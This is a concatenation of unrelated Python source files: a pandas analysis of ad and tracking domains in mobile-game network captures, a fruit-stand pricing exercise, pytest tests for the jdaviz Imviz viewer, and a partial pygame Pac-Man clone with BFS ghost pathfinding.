    domain_class2 = df2[['domain', 'service']]
    domain_class = (domain_class1.append(domain_class2)).drop_duplicates().reset_index()
    domain_class.drop(['index'], axis=1, inplace=True)
    # IDIOM: collections.Counter replaces the manual counting dict; it
    # preserves first-seen insertion order exactly like the original dict.
    df = p.DataFrame.from_dict(Counter(all_domains), orient='index')
    df.reset_index(inplace=True)
    df.columns = ['domain', 'Count']
    # Attach the service classification to each counted domain.
    df = df.merge(domain_class)
    df.columns = ['Domain', 'Count', 'Service']
    df.sort_values(by='Count', inplace=True, ascending=False)
    df.set_index('Domain', inplace=True)
    # print(df.head(10))
    print(df.head(10).to_latex())
def sum_domain(path, app_name, domain):
    """Print the total frame size (bytes) associated with `domain` across
    both the HTTP and HTTPS sheets of the app's capture workbook."""
    http_frame = p.read_excel(path, index_col=None, sheet_name="HTTP")
    https_frame = p.read_excel(path, index_col=None, sheet_name="HTTPS")
    combined = http_frame.append(https_frame)
    matching = combined[combined['domain'] == domain]
    print(sum(matching['frame size']))
def non_benign_domains(path, app_name):
    """Print the ten non-benign (ad/tracking) domains with the most traffic
    across the HTTP and HTTPS sheets of the app's capture workbook."""
    http_frame = p.read_excel(path, index_col=None, sheet_name="HTTP")
    https_frame = p.read_excel(path, index_col=None, sheet_name="HTTPS")
    combined = http_frame.append(https_frame)
    # Keep only rows whose service class is something other than 'benign'.
    combined.drop((combined[combined['service'] == 'benign'].index), inplace=True)
    totals = combined.groupby('domain')['frame size'].sum()
    totals.sort_values(inplace=True, ascending=False)
    print(totals.head(10))
############################################
# SUMMARY STUFF #
############################################
def compare_ips_to_domains():
    """Bar-chart, per app, unique IP counts next to domain counts for the
    benign/ad/tracking categories from the game summary CSV."""
    cols = ['Package Name', 'Benign Domains', 'Benign IPs', 'Ad Domains', 'Ad IPs', 'Tracking Domains', 'Tracking IPs']
    df = p.read_csv('./make_it_stop/Pandas/game_summary.csv', index_col=None, usecols=cols)
    def count_domains(domain_string):
        # Domain cells hold comma-separated lists; NaN means none recorded.
        if(p.isnull(domain_string)):
            count = 0
        else:
            count = len(domain_string.split(','))
        return count
    def should_drop(row):
        # Drop apps with zero domains AND zero IPs in every category.
        drop = False
        a = row['Benign Domain Count'] == 0
        b = row['Ad Domain Count'] == 0
        c = row['Tracking Domain Count'] == 0
        d = row['Benign IPs'] == 0
        e = row['Ad IPs'] == 0
        f = row['Tracking IPs'] == 0
        if(a and b and c and d and e and f):
            drop = True
        return drop
    df['Benign Domain Count'] = list(map(lambda x: count_domains(x), df['Benign Domains']))
    df['Ad Domain Count'] = list(map(lambda x: count_domains(x), df['Ad Domains']))
    df['Tracking Domain Count'] = list(map(lambda x: count_domains(x), df['Tracking Domains']))
    df.drop('Benign Domains', axis=1, inplace=True)
    df.drop('Ad Domains', axis=1, inplace=True)
    df.drop('Tracking Domains', axis=1, inplace=True)
    df['Should Drop'] = df.apply(should_drop, axis=1)
    df = df.drop(df[df['Should Drop']].index)
    df.drop('Should Drop', axis=1, inplace=True)
    df['Package Name'] = list(map(lambda x: clean_package_name(x), df['Package Name']))
    df.set_index('Package Name', inplace=True)
    # Interleave IP and domain counts per category for side-by-side bars.
    df = df[['Benign IPs', 'Benign Domain Count', 'Ad IPs', 'Ad Domain Count', 'Tracking IPs', 'Tracking Domain Count']]
    ax = df.plot(kind='bar', stacked=False, figsize=(16, 5), rot=0, width=0.8)
    plt.show()
def compare_confirmed_to_suspected():
    """Plot suspected (HTTP) versus confirmed (HTTPS) ad/tracking IP counts.

    Saves the figure to ./graphs/v3/suspected_vs_confirmed_ips.png.
    """
    cols = ['Package Name', 'Suspected Ad IPs', 'Ad IPs', 'Suspected Tracking IPs', 'Tracking IPs']
    renamed = ['HTTP Ad IPs', 'HTTPS Ad IPs', 'HTTP Tracking IPs', 'HTTPS Tracking IPs']
    df = p.read_csv('./make_it_stop/Pandas/game_summary.csv', index_col=None, usecols=cols)
    df['Package Name'] = list(map(clean_package_name, df['Package Name']))
    df.set_index('Package Name', inplace=True)
    df = df[cols[1:]]
    df.columns = renamed

    palette = sns.color_palette()
    fig, ax = plt.subplots(figsize=(11, 7))
    # Two offset stacked bar groups per app: HTTP on the left, HTTPS on the right.
    df[[renamed[0], renamed[2]]].plot.bar(ax=ax, stacked=True, position=1, width=0.4, color=palette[0:2])
    df[[renamed[1], renamed[3]]].plot.bar(ax=ax, stacked=True, position=0, width=0.4, color=palette[2:4])
    plt.title("HTTP versus HTTPS Advertisement and Tracking IPs")
    plt.xlabel("Application")
    plt.ylabel("Total Number of IPs")
    plt.savefig("./graphs/v3/suspected_vs_confirmed_ips.png")
    # plt.show()
# for app in all_apps:
# print(app)
# ips_over_time("./make_it_stop/Pandas/" + app + ".apk.xlsx", "HTTPS", app)
# frames_over_time("./make_it_stop/Pandas/" + app + ".apk.xlsx", "HTTPS", app)
# domains_over_time("./make_it_stop/Pandas/" + app + ".apk.xlsx", "HTTPS", app)
# https_vs_http("./make_it_stop/Pandas/" + app + ".apk.xlsx", app)
# if(app not in no_http):
# ips_over_time("./make_it_stop/Pandas/" + app + ".apk.xlsx", "HTTP", app)
# frames_over_time("./make_it_stop/Pandas/" + app + ".apk.xlsx", "HTTP", app)
# domains_over_time("./make_it_stop/Pandas/" + app + ".apk.xlsx", "HTTP", app)
# plt.close('all')
# sum_domain("./make_it_stop/Pandas/" + all_apps[4] + ".apk.xlsx", all_apps[4],
#            "ct.pinterest.com")
# Ad-hoc driver: report the top non-benign domains for the fifth app in all_apps.
non_benign_domains("./make_it_stop/Pandas/" + all_apps[4] + ".apk.xlsx", all_apps[4])
# get_all_domains("./make_it_stop/Pandas/" + all_apps[4] + ".apk.xlsx", all_apps[4])
# compare_ips_to_domains()
# compare_confirmed_to_suspected()
# benign_domains("./make_it_stop/Pandas/io.voodoo.paper2.apk.xlsx", "io.voodoo.paper2")
|
# Fruit stand: compute the price of `set_count` packs of `fruit`.
# Small packs hold 2 units, any other size 5, with per-unit prices per fruit.
SMALL_PACK_PRICES = {"Watermelon": 56, "Mango": 36.66, "Pineapple": 42.10, "Raspberry": 20}
LARGE_PACK_PRICES = {"Watermelon": 28.70, "Mango": 19.60, "Pineapple": 24.80, "Raspberry": 15.20}

fruit = input()
size = input()
set_count = int(input())

if size == "small":
    pack = 2
    price_pack = pack * SMALL_PACK_PRICES.get(fruit, 0)
else:
    pack = 5
    price_pack = pack * LARGE_PACK_PRICES.get(fruit, 0)

total_price = price_pack * set_count

# Bulk discount: 15% off between 400 and 1000 lv (inclusive), 50% off above 1000 lv.
if 400 <= total_price <= 1000:
    total_price *= 0.85
elif total_price > 1000:
    total_price *= 0.50

print(f'{total_price:.2f} lv.')
|
import os
import asdf
import numpy as np
import pytest
from astropy import units as u
from astropy.coordinates import SkyCoord
from astropy.nddata import NDData
from astropy.table import Table
from astropy.utils.data import get_pkg_data_filename
from astropy.visualization import AsinhStretch, LinearStretch, LogStretch, SqrtStretch
from numpy.testing import assert_allclose
from jdaviz.configs.imviz.tests.utils import BaseImviz_WCS_NoWCS, BaseImviz_WCS_WCS
# TODO: Remove skip when https://github.com/bqplot/bqplot/pull/1397/files#r726500097 is resolved.
@pytest.mark.skip(reason="Cannot test due to async JS callback")
class TestSave(BaseImviz_WCS_NoWCS):
    """Smoke test for Imviz viewer save()."""

    def test_save(self, tmpdir):
        filename = os.path.join(tmpdir.strpath, 'myimage')
        self.viewer.save(filename)

        # This only tests that something saved, not the content.
        # BUG FIX: the assertion previously checked the literal path
        # '(unknown).png' (a leaked placeholder) instead of the file just saved.
        assert os.path.isfile(f'{filename}.png')
class TestCenterOffset(BaseImviz_WCS_NoWCS):
    """center_on()/offset_by() in pixel and sky coordinates."""

    def test_center_offset_pixel(self):
        self.viewer.center_on((0, 1))
        assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
                         self.viewer.state.y_min, self.viewer.state.y_max),
                        (-5, 5, -4, 6))

        # pix and dimensionless quantities are both accepted as pixel offsets.
        self.viewer.offset_by(1 * u.pix, -1 * u.dimensionless_unscaled)
        assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
                         self.viewer.state.y_min, self.viewer.state.y_max),
                        (-4, 6, -5, 5))

        # Plain floats are treated as pixels too.
        self.viewer.offset_by(1, 0)
        assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
                         self.viewer.state.y_min, self.viewer.state.y_max),
                        (-3, 7, -5, 5))

        # Out-of-bounds centering is now allowed because it is needed
        # for dithering use case.
        self.viewer.center_on((-1, 99999))
        assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
                         self.viewer.state.y_min, self.viewer.state.y_max),
                        (-6, 4, 9.99940e+04, 1.00004e+05))

        # Sometimes invalid WCS also gives such output, should be no-op
        self.viewer.center_on((np.array(np.nan), np.array(np.nan)))
        assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
                         self.viewer.state.y_min, self.viewer.state.y_max),
                        (-6, 4, 9.99940e+04, 1.00004e+05))

    def test_center_offset_sky(self):
        # Blink to the one with WCS because the last loaded data is shown.
        self.viewer.blink_once()

        sky = self.wcs.pixel_to_world(0, 1)
        self.viewer.center_on(sky)
        assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
                         self.viewer.state.y_min, self.viewer.state.y_max),
                        (-5, 5, -4, 6))

        dsky = 0.1 * u.arcsec
        self.viewer.offset_by(-dsky, dsky)
        assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
                         self.viewer.state.y_min, self.viewer.state.y_max),
                        (-4.9, 5.1, -3.90000000002971, 6.09999999997029))

        # Cannot mix pixel with sky
        with pytest.raises(ValueError, match='but dy is of type'):
            self.viewer.offset_by(0.1, dsky)

        # Cannot pass invalid Quantity
        with pytest.raises(u.UnitTypeError):
            self.viewer.offset_by(dsky, 1 * u.AA)
        with pytest.raises(u.UnitTypeError):
            self.viewer.offset_by(1 * u.AA, dsky)

        # Blink to the one without WCS
        self.viewer.blink_once()
        with pytest.raises(AttributeError, match='does not have a valid WCS'):
            self.viewer.center_on(sky)
        with pytest.raises(AttributeError, match='does not have a valid WCS'):
            self.viewer.offset_by(dsky, dsky)
class TestCenter(BaseImviz_WCS_WCS):
    """center_on() with two WCS-linked images dithered by one pixel."""

    def test_center_on_pix(self):
        self.imviz.link_data(link_type='wcs', error_on_fail=True)

        # This is the second loaded data that is dithered by 1-pix.
        self.viewer.center_on((0, 0))
        assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
                         self.viewer.state.y_min, self.viewer.state.y_max),
                        (-6, 4, -5, 5))

        # This is the first data.
        self.viewer.blink_once()
        self.viewer.center_on((0, 0))
        assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
                         self.viewer.state.y_min, self.viewer.state.y_max),
                        (-5, 5, -5, 5))

        # Centering by sky on second data.
        self.viewer.blink_once()
        sky = self.wcs_2.pixel_to_world(0, 0)
        self.viewer.center_on(sky)
        assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
                         self.viewer.state.y_min, self.viewer.state.y_max),
                        (-6, 4, -5, 5))
class TestZoom(BaseImviz_WCS_NoWCS):
    """zoom()/zoom_level semantics, centered and off-center."""

    @pytest.mark.parametrize('val', (0, -0.1, 'foo', [1, 2]))
    def test_invalid_zoom_level(self, val):
        with pytest.raises(ValueError, match='Unsupported zoom level'):
            self.viewer.zoom_level = val

    def test_invalid_zoom(self):
        with pytest.raises(ValueError, match='zoom only accepts int or float'):
            self.viewer.zoom('fit')

    def assert_zoom_results(self, zoom_level, x_min, x_max, y_min, y_max, dpix):
        """Check the zoom level and viewport limits, shifted by *dpix* pixels
        for the off-center case."""
        assert_allclose(self.viewer.zoom_level, zoom_level)
        assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
                         self.viewer.state.y_min, self.viewer.state.y_max),
                        (x_min + dpix, x_max + dpix,
                         y_min + dpix, y_max + dpix))

    @pytest.mark.parametrize('is_offcenter', (False, True))
    def test_zoom(self, is_offcenter):
        if is_offcenter:
            self.viewer.center_on((0, 0))
            dpix = -4.5
        else:
            self.viewer.center_on((4.5, 4.5))
            dpix = 0
        self.assert_zoom_results(10, -0.5, 9.5, -0.5, 9.5, dpix)

        # NOTE: Not sure why X/Y min/max not exactly the same as aspect ratio 1
        self.viewer.zoom_level = 1
        self.assert_zoom_results(1, -46, 54, -45.5, 54.5, dpix)
        self.viewer.zoom_level = 2
        self.assert_zoom_results(2, -21.5, 28.5, -20.5, 29.5, dpix)
        # zoom() is relative to the current level (2 * 2 -> 4).
        self.viewer.zoom(2)
        self.assert_zoom_results(4, -9.5, 15.5, -8.0, 17.0, dpix)
        self.viewer.zoom(0.5)
        self.assert_zoom_results(2, -22.5, 27.5, -20.5, 29.5, dpix)
        self.viewer.zoom_level = 0.5
        self.assert_zoom_results(0.5, -98, 102, -95.5, 104.5, dpix)

        # This fits the whole image on screen, regardless.
        # NOTE: But somehow Y min/max auto-adjust does not work properly
        # in the unit test when off-center. Works in notebook though.
        if not is_offcenter:
            self.viewer.zoom_level = 'fit'
            self.assert_zoom_results(10, -0.5, 9.5, -0.5, 9.5, 0)
class TestCmapStretchCuts(BaseImviz_WCS_NoWCS):
    """Colormap, stretch, and cut-level API, including per-layer persistence."""

    def test_colormap_options(self):
        assert self.viewer.colormap_options == [
            'Gray', 'Viridis', 'Plasma', 'Inferno', 'Magma', 'Purple-Blue',
            'Yellow-Green-Blue', 'Yellow-Orange-Red', 'Red-Purple', 'Blue-Green',
            'Hot', 'Red-Blue', 'Red-Yellow-Blue', 'Purple-Orange', 'Purple-Green',
            'Rainbow', 'Seismic',
            'Reversed: Gray', 'Reversed: Viridis', 'Reversed: Plasma', 'Reversed: Inferno',
            'Reversed: Magma', 'Reversed: Hot', 'Reversed: Rainbow']

    def test_invalid_colormap(self):
        with pytest.raises(ValueError, match='Invalid colormap'):
            self.viewer.set_colormap('foo')

    def test_stretch_options(self):
        assert self.viewer.stretch_options == ['arcsinh', 'linear', 'log', 'sqrt']

    @pytest.mark.parametrize(('vizclass', 'ans'),
                             [(AsinhStretch, 'arcsinh'),
                              (LinearStretch, 'linear'),
                              (LogStretch, 'log'),
                              (SqrtStretch, 'sqrt')])
    def test_stretch_astropy(self, vizclass, ans):
        # Assigning an astropy stretch class reads back as the string name.
        self.viewer.stretch = vizclass
        assert self.viewer.stretch == ans

    def test_invalid_stretch(self):
        class FakeStretch:
            pass

        with pytest.raises(ValueError, match='Invalid stretch'):
            self.viewer.stretch = FakeStretch

        with pytest.raises(ValueError, match='Invalid stretch'):
            self.viewer.stretch = 'foo'

    def test_autocut_options(self):
        assert self.viewer.autocut_options == ['minmax', '99.5%', '99%', '95%', '90%']

    # The minmax case shows the fixture image spans values 0..99, which makes
    # the percentile cuts below exact.
    @pytest.mark.parametrize(('auto_option', 'ans'),
                             [('minmax', (0, 99)),
                              ('99.5%', (0.2475, 98.7525)),
                              ('99%', (0.495, 98.505)),
                              ('95%', (2.475, 96.525)),
                              ('90%', (4.95, 94.05))])
    def test_autocut(self, auto_option, ans):
        self.viewer.cuts = auto_option
        assert_allclose(self.viewer.cuts, ans)

    def test_invalid_autocut(self):
        with pytest.raises(ValueError, match='Invalid autocut'):
            self.viewer.cuts = 'foo'

    @pytest.mark.parametrize('val', [99, (1, ), (1, 2, 3), (1, 'foo')])
    def test_invalid_cuts(self, val):
        with pytest.raises(ValueError, match='Invalid cut levels'):
            self.viewer.cuts = val

    def test_cmap_stretch_cuts(self):
        # Change colormap, stretch, and cuts on one image
        self.viewer.set_colormap('Viridis')
        self.viewer.stretch = 'sqrt'
        self.viewer.cuts = '95%'

        self.viewer.blink_once()

        # Change colormap, stretch, and cuts on other image
        self.viewer.set_colormap('Red-Yellow-Blue')
        self.viewer.stretch = AsinhStretch
        self.viewer.cuts = (0, 100)

        # Make sure settings stick on both images, second image displayed/changed first above.
        assert self.viewer.state.layers[0].cmap.name == 'RdYlBu'  # matplotlib name, not Glue
        assert self.viewer.state.layers[0].stretch == 'arcsinh'
        assert_allclose((self.viewer.state.layers[0].v_min, self.viewer.state.layers[0].v_max),
                        (0, 100))

        assert self.viewer.state.layers[1].cmap.name == 'viridis'  # matplotlib name, not Glue
        assert self.viewer.state.layers[1].stretch == 'sqrt'
        assert_allclose((self.viewer.state.layers[1].v_min, self.viewer.state.layers[1].v_max),
                        (2.475, 96.525))

        # Go back to initial image for other tests.
        self.viewer.blink_once()
class TestMarkers(BaseImviz_WCS_NoWCS):
    """add_markers()/remove_markers() in pixel and sky modes, plus styling."""

    def test_invalid_markers(self):
        with pytest.raises(KeyError, match='Invalid attribute'):
            self.viewer.marker = {'foo': 'bar', 'alpha': 0.8}
        with pytest.raises(ValueError, match='Invalid RGBA argument'):
            self.viewer.marker = {'color': 'greenfishbluefish'}
        with pytest.raises(ValueError, match='Invalid alpha'):
            self.viewer.marker = {'alpha': '1'}
        with pytest.raises(ValueError, match='Invalid alpha'):
            self.viewer.marker = {'alpha': 42}
        with pytest.raises(ValueError, match='Invalid marker size'):
            self.viewer.marker = {'markersize': '1'}
        with pytest.raises(ValueError, match='Invalid fill'):
            self.viewer.marker = {'fill': '1'}

    def test_mvp_markers(self):
        x_pix = (0, 0)
        y_pix = (0, 1)
        sky = self.wcs.pixel_to_world(x_pix, y_pix)
        tbl = Table({'x': x_pix, 'y': y_pix, 'coord': sky})

        # Pixel markers land in the data collection with default style.
        self.viewer.add_markers(tbl)
        data = self.imviz.app.data_collection[2]
        assert data.label == 'default-marker-name'
        assert data.style.color in ('red', '#ff0000')
        assert data.style.marker == 'o'
        assert_allclose(data.style.markersize, 5)
        assert_allclose(data.style.alpha, 1)
        assert_allclose(data.get_component('x').data, x_pix)
        assert_allclose(data.get_component('y').data, y_pix)
        assert self.viewer.layers[2].layer.label == data.label
        assert self.viewer.layers[2].state.fill is True

        # Table with only sky coordinates but no use_skycoord=True
        with pytest.raises(KeyError):
            self.viewer.add_markers(tbl[('coord', )])

        # Cannot use reserved marker name
        with pytest.raises(ValueError, match='not allowed'):
            self.viewer.add_markers(tbl, use_skycoord=True, marker_name='all')

        # Custom styling applies to markers added after the assignment.
        self.viewer.marker = {'color': (0, 1, 0), 'alpha': 0.8, 'fill': False}
        self.viewer.add_markers(tbl, use_skycoord=True, marker_name='my_sky')
        data = self.imviz.app.data_collection[3]
        assert data.label == 'my_sky'
        assert data.style.color in ((0, 1, 0), '#00ff00')
        assert data.style.marker == 'o'
        assert_allclose(data.style.markersize, 3)  # Glue default
        assert_allclose(data.style.alpha, 0.8)
        assert_allclose(data.get_component('ra').data, sky.ra.deg)
        assert_allclose(data.get_component('dec').data, sky.dec.deg)
        assert self.viewer.layers[3].layer.label == data.label
        assert self.viewer.layers[3].state.fill is False

        # Make sure the other marker is not changed.
        assert self.imviz.app.data_collection[2].style.color in ('red', '#ff0000')
        assert self.viewer.layers[2].state.fill is True

        # TODO: How to check imviz.app.data_collection.links is correct?
        assert len(self.imviz.app.data_collection.links) == 14

        # Just want to make sure nothing crashes. Zooming already testing elsewhere.
        # https://github.com/spacetelescope/jdaviz/pull/1971
        self.viewer.zoom_level = 'fit'

        # Remove markers with default name.
        self.viewer.remove_markers()
        assert self.imviz.app.data_collection.labels == [
            'has_wcs[SCI,1]', 'no_wcs[SCI,1]', 'my_sky']

        # Reset markers (runs remove_markers with marker_name set)
        self.viewer.reset_markers()
        assert self.imviz.app.data_collection.labels == [
            'has_wcs[SCI,1]', 'no_wcs[SCI,1]']
        assert len(self.imviz.app.data_collection.links) == 10

        # NOTE: This changes the state of self.imviz for this test class!
        self.imviz.app.data_collection.remove(self.imviz.app.data_collection[0])
        with pytest.raises(AttributeError, match='does not have a valid WCS'):
            self.viewer.add_markers(tbl, use_skycoord=True, marker_name='my_sky')

        self.imviz.app.data_collection.clear()
        with pytest.raises(AttributeError, match='does not have a valid WCS'):
            self.viewer.add_markers(tbl, use_skycoord=True, marker_name='my_sky')
def test_markers_gwcs_lonlat(imviz_helper):
    """GWCS uses Lon/Lat for ICRS."""
    gw_file = get_pkg_data_filename('data/miri_i2d_lonlat_gwcs.asdf')

    with asdf.open(gw_file) as af:
        gw = af.tree['wcs']

    ndd = NDData(np.ones((10, 10), dtype=np.float32), wcs=gw, unit='MJy/sr')
    imviz_helper.load_data(ndd, data_label='MIRI_i2d')
    assert imviz_helper.app.data_collection[0].label == 'MIRI_i2d[DATA]'
    # Component names come out as Lon/Lat, not RA/Dec.
    assert imviz_helper.app.data_collection[0].components == [
        'Pixel Axis 0 [y]', 'Pixel Axis 1 [x]', 'Lat', 'Lon', 'DATA']

    # If you run this interactively, should appear slightly off-center.
    calib_cat = Table({'coord': [SkyCoord(80.6609, -69.4524, unit='deg')]})
    imviz_helper.default_viewer.add_markers(calib_cat, use_skycoord=True, marker_name='my_sky')
    assert imviz_helper.app.data_collection[1].label == 'my_sky'
|
# -*- coding: utf-8 -*-
# @Author: Ben
# @Date: 2017-03-03 22:23:44
# @Last Modified by: Ben
# @Last Modified time: 2018-05-18 23:12:52
# /Library/Frameworks/Python.framework/Versions/3.6/bin/python3.6 PATMAN.py
import os
import pygame
import time
import random
import sys
from math import sqrt
import operator
class Game:
    """Tracks the score and detects player/ghost collisions."""

    def __init__(self):
        self.points = 0  # pellets eaten so far

    def check(self, player, ghost):
        """Return False when the ghost is within 10px of the player (caught),
        True otherwise (still safe)."""
        dx = ghost.rect.x - player.rect.x
        dy = ghost.rect.y - player.rect.y
        return sqrt(dx * dx + dy * dy) > 10
class Queue():
    """Bounded FIFO: enqueueing onto a full queue silently evicts the oldest item.

    dequeue() on an empty queue returns False (a sentinel callers must
    distinguish from real items). `maxsize` may be float("inf") for an
    unbounded queue (isFull() is then never true).
    """

    def __init__(self, maxsize):
        self.queue = []
        self.start = 0    # index of the oldest element (always 0 in practice)
        self.end = -1     # index of the newest element; -1 means empty
        self.maxsize = maxsize

    def isEmpty(self):
        # end trails start only when nothing is stored.
        return self.end - self.start < 0

    def isFull(self):
        # Renamed from `len`, which shadowed the builtin.
        length = self.end - self.start
        return length + 1 == self.maxsize

    def enqueue(self, item):
        if self.isFull():
            self.dequeue()  # evict the oldest item to make room
        self.end += 1
        self.queue.insert(self.end, item)

    def dequeue(self):
        if self.isEmpty():
            return False
        self.end -= 1
        return self.queue.pop(self.start)
class Graph:
    """Walkable-cell graph built from the ASCII map; nodes are (x, y) pixel coords."""

    def __init__(self, grid, distance):
        # *distance* is the pixel stride between adjacent grid cells.
        self.distance = distance
        self.nodes = []
        x = y = xcount = ycount = 0
        for row in grid:
            for col in row:
                if not col == "W":
                    # Every non-wall cell is walkable.
                    self.nodes.append((x, y))
                    # pygame.draw.rect(screen, (0, 255, 0), frontierdisplay[str((x, y))].rect)
                    # pygame.display.update()
                x += distance
                xcount += 1
            xcount = 0
            y += distance
            x = 0
            ycount += 1
        time.sleep(1)
        # Debug visualisation of every walkable node.
        for node in self.nodes:
            # NOTE(review): passes the Wall object itself, not its .rect, to
            # pygame.draw.rect (the commented-out line above used .rect) --
            # confirm pygame accepts this; otherwise it raises TypeError.
            pygame.draw.rect(screen, (0, 255, 0), frontierdisplay[str((node[0], node[1]))])
            pygame.display.flip()
            # time.sleep(0.1)
        # NOTE(review): blocks start-up until Enter is pressed on the console.
        input()

    def neighbours(self, node):
        """Return the 4-connected walkable neighbours of *node*, or None when
        *node* itself is not a walkable cell."""
        if node not in self.nodes:
            return None
        directions = [[self.distance, 0], [-self.distance, 0], [0, self.distance], [0, -self.distance]]
        neighbours = []
        for direction in directions:
            neighbour = (node[0] + direction[0], node[1] + direction[1])
            if neighbour in self.nodes:
                neighbours.append(neighbour)
        return neighbours
class Ghost:
    """Enemy sprite that BFS-pathfinds toward the player (or a screen corner)."""

    def __init__(self, pos):
        # Self-registers in the global ghost list on construction.
        ghosts.append(self)
        self.rect = pygame.Rect(pos[0], pos[1], 20, 20)
        self.previouspos = (self.rect.x, self.rect.y)
        self.direction = 3
        self.corner = None  # corner target used while the player is in the ghost house
        # NOTE(review): move() reads self.previouscoordinates and
        # self.teleportcoords, but their initialisation is commented out below.
        # Main() patches teleportcoords on externally; previouscoordinates is
        # never restored, so calling move() as written raises AttributeError.
        # self.previouscoordinates = Queue(4)
        # self.count = 0
        # self.scared = False
        # self.scaredCount = 0
        # self.previousPath = []
        # self.teleporting = False
        # self.teleportcoords = []

    def move(self, dy, dx):
        """Step by (dy, dx) with wall clamping and tunnel teleporting.

        Returns False if a wall blocked either axis, True otherwise.
        """
        if dx != 0:
            if self.move_single_axis(dx, 0) == False:
                return False
        if dy != 0:
            if self.move_single_axis(0, dy) == False:
                return False
        self.previouscoordinates.enqueue([self.rect.x, self.rect.y])
        if [self.rect.x, self.rect.y] in self.teleportcoords:
            if self.teleportcoords.index([self.rect.x, self.rect.y]) == 0:
                # Left portal: re-emerge near the right portal heading left,
                # unless already travelling right (just finished teleporting).
                if self.direction != 3:
                    self.rect.x = self.teleportcoords[1][0]+200
                    self.rect.y = self.teleportcoords[1][1]
                    self.direction = 2
                    self.teleporting = True
                else:
                    self.teleporting = False
            elif self.teleportcoords.index([self.rect.x, self.rect.y]) == 1:
                # Right portal: mirror of the above.
                if self.direction != 2:
                    self.rect.x = self.teleportcoords[0][0]-200
                    self.rect.y = self.teleportcoords[0][1]
                    self.direction = 3
                    self.teleporting = True
                else:
                    self.teleporting = False
        return True

    def move_single_axis(self, dx, dy):
        """Shift along one axis; on collision clamp to the wall edge and return False."""
        self.rect.x += dx
        self.rect.y += dy
        for wall in walls:
            if self.rect.colliderect(wall.rect):
                if dx > 0:
                    self.rect.right = wall.rect.left
                if dx < 0:
                    self.rect.left = wall.rect.right
                if dy > 0:
                    self.rect.bottom = wall.rect.top
                if dy < 0:
                    self.rect.top = wall.rect.bottom
                return False
        return True

    def pursue(self, player, landscape, middle):
        """BFS from this ghost toward *player* (an (x, y) tuple) over *landscape*.

        While the player is inside the ghost-house cells (*middle*), the ghost
        heads for a random screen corner instead. Returns the path as a list
        of coordinates starting at the ghost's own cell; when no path is
        found, returns just [target].
        """
        if player not in middle:
            self.corner = None
        else:
            corners = [(20, 20), (380, 20), (20, 380), (380, 380)]
            # Pick a new corner (different from where the ghost already is).
            if self.corner == None or (self.rect.x, self.rect.y) == self.corner:
                while True:
                    self.corner = player = random.choice(corners)
                    if not (self.rect.x, self.rect.y) == player:
                        break
            else:
                player = self.corner
        start = (self.rect.x, self.rect.y)
        frontier = Queue(float("inf"))
        frontier.enqueue(start)
        came_from = {}
        came_from[start] = None
        end = False
        # Random colour for the (commented-out) frontier visualisation below.
        r = random.randint(0, 255)
        g = random.randint(0, 255)
        b = random.randint(0, 255)
        while not frontier.isEmpty():
            current = frontier.dequeue()
            temp = (current[0] + 10, current[1] + 10)
            # Goal test: cell centre within 10px of the target on both axes.
            if (player[0]-10 <= temp[0] and player[0]+10 >= temp[0]) and (player[1]-10 <= temp[1] and player[1]+10 >= temp[1]):
                end = current
                break
            neighbours = landscape.neighbours(current)
            if neighbours is not None:
                for next in neighbours:
                    if next not in came_from:
                        frontier.enqueue(next)
                        came_from[next] = current
                        # time.sleep(0.01)
                        # pygame.draw.rect(screen, (r, g, b), frontierdisplay[str(next)].rect)
                        # pygame.display.flip()
        if not end:
            return [player]
        path = []
        i = 0
        ##Creates Paths##
        # Walk the came_from chain back to start; the goal cell itself is
        # deliberately not included in the returned path.
        while end != start:
            end = came_from[end]
            path.append(end)
        return list(reversed(path))

    def retreat(self, corner, player, blockeddirections):
        """Head toward one of four fixed corners by temporarily teleporting the
        player there and chasing that phantom position.

        NOTE(review): relies on self.chase(), which is not defined anywhere in
        this file -- calling retreat() as written raises AttributeError.
        """
        if corner == 1:
            x = player.rect.x
            y = player.rect.y
            player.rect.x = 40
            player.rect.y = 30
            self.direction = self.chase(player, blockeddirections)
            player.rect.x = x
            player.rect.y = y
        if corner == 2:
            x = player.rect.x
            y = player.rect.y
            player.rect.x = 390
            player.rect.y = 30
            self.direction = self.chase(player, blockeddirections)
            player.rect.x = x
            player.rect.y = y
        if corner == 3:
            x = player.rect.x
            y = player.rect.y
            player.rect.x = 50
            player.rect.y = 390
            self.direction = self.chase(player, blockeddirections)
            player.rect.x = x
            player.rect.y = y
        if corner == 4:
            x = player.rect.x
            y = player.rect.y
            player.rect.x = 370
            player.rect.y = 390
            self.direction = self.chase(player, blockeddirections)
            player.rect.x = x
            player.rect.y = y
class Player:
    """The player-controlled sprite."""

    def __init__(self, size):
        self.rect = pygame.Rect(20, 20, size, size)
        self.direction = 3  # 0=up, 1=down, 2=left, 3=right (see Main's key handling)

    def move(self, dy, dx, teleportcoords):
        """Attempt a (dy, dx) step; cross the tunnel when landing on a portal.

        Returns False when a wall blocked either axis, True otherwise.
        """
        if dx != 0 and not self.move_single_axis(dx, 0):
            return False
        if dy != 0 and not self.move_single_axis(0, dy):
            return False

        pos = [self.rect.x, self.rect.y]
        if pos in teleportcoords:
            if teleportcoords.index(pos) == 0:
                # Left portal: emerge just inside the right one, heading left.
                self.rect.x = teleportcoords[1][0] - 10
                self.rect.y = teleportcoords[1][1]
                self.direction = 2
            elif teleportcoords.index(pos) == 1:
                # Right portal: emerge just inside the left one, heading right.
                self.rect.x = teleportcoords[0][0] + 10
                self.rect.y = teleportcoords[0][1]
                self.direction = 3
        return True

    def move_single_axis(self, dx, dy):
        """Shift along one axis; on collision clamp to the wall edge and return False."""
        self.rect.x += dx
        self.rect.y += dy
        for wall in walls:
            if not self.rect.colliderect(wall.rect):
                continue
            if dx > 0:
                self.rect.right = wall.rect.left
            if dx < 0:
                self.rect.left = wall.rect.right
            if dy > 0:
                self.rect.bottom = wall.rect.top
            if dy < 0:
                self.rect.top = wall.rect.bottom
            return False
        return True
class Wall:
    """One 20x20 grid cell.

